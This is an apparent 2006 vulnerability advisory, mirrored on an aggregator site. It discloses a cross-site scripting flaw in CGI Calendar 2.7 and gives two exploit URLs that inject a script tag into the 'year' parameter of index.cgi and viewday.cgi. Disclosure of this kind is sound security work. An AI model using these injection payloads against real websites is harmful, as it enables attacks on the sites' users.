Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11612
HistoryFeb 28, 2006 - 12:00 a.m.

CGI Calendar XSS Vulnerability

2006-02-2800:00:00
vulners.com
10

CGI Calendar XSS Vulnerability

Software: CGI Calendar
Version: 2.7
http://cgicalendar.sourceforge.net/

Description: an online calendar implemented using CGI technology

Vulnerability: Cross-Site Scripting

Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

Credit:
Discovered by Revnic Vasile
[email protected]